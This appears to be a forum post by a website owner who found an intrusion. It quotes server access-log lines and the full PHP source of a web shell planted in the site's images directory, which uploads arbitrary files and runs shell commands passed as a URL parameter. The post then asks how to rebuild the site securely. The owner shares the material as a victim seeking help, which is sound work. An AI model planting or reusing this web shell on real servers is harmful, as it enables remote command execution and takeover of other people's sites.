The next standout from the logs is a file called index.php showing up in the images directory:
Code: Select all
94.242.252.39 - - [11/May/2017:00:59:49 -0400] "GET /image/data/atlarge/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
Code: Select all
<?php
if(@$_REQUEST["id"]== 'jj')
{
$files = @$_FILES["files"];
if($files["name"] != ''){
$fullpath = $_REQUEST["path"].$files["name"];
if(move_uploaded_file($files['tmp_name'],$fullpath)){
echo "<h1><a href='$fullpath'>shell</a></h1>";
}
}
exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
}
if(@$_REQUEST["id"]== 'pp')
{
system($_GET["cmd"]);
}
?>
Code: Select all
94.242.252.39 - - [11/May/2017:01:00:08 -0400] "POST /image/data/atlarge/index.php?id=jj HTTP/1.1" 200 190 "https://www.xxx.ca/image/data/atlarge/index.php?id=jj" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
Code: Select all
94.242.252.39 - - [11/May/2017:01:00:14 -0400] "GET /image/data/atlarge/web.php HTTP/1.1" 200 40459 "https://www.xxx.ca/image/data/atlarge/index.php?id=jj" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
94.242.252.39 - - [11/May/2017:01:00:15 -0400] "GET /image/data/atlarge/web.php?image=smiley HTTP/1.1" 200 92 "https://www.xxx.ca/image/data/atlarge/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
94.242.252.39 - - [11/May/2017:01:00:15 -0400] "GET /image/data/atlarge/web.php?image=folder HTTP/1.1" 200 90 "https://www.xxx.ca/image/data/atlarge/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
94.242.252.39 - - [11/May/2017:01:00:15 -0400] "GET /image/data/atlarge/web.php?image=file HTTP/1.1" 200 93 "https://www.xxx.ca/image/data/atlarge/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
However that's when I started combing throught the logs and found all this and put the site in maintenance mode. Any advice on how to get the site up and running securely again? I'm thinking obviously fresh file install, what's the best way to do that with the database? Can I just dump the fresh download and replace the config files? This clearly attacked my images dir but I need those, I've searched through the directory and find no more .php files in it.
Thanks in advance for any advice or guidance.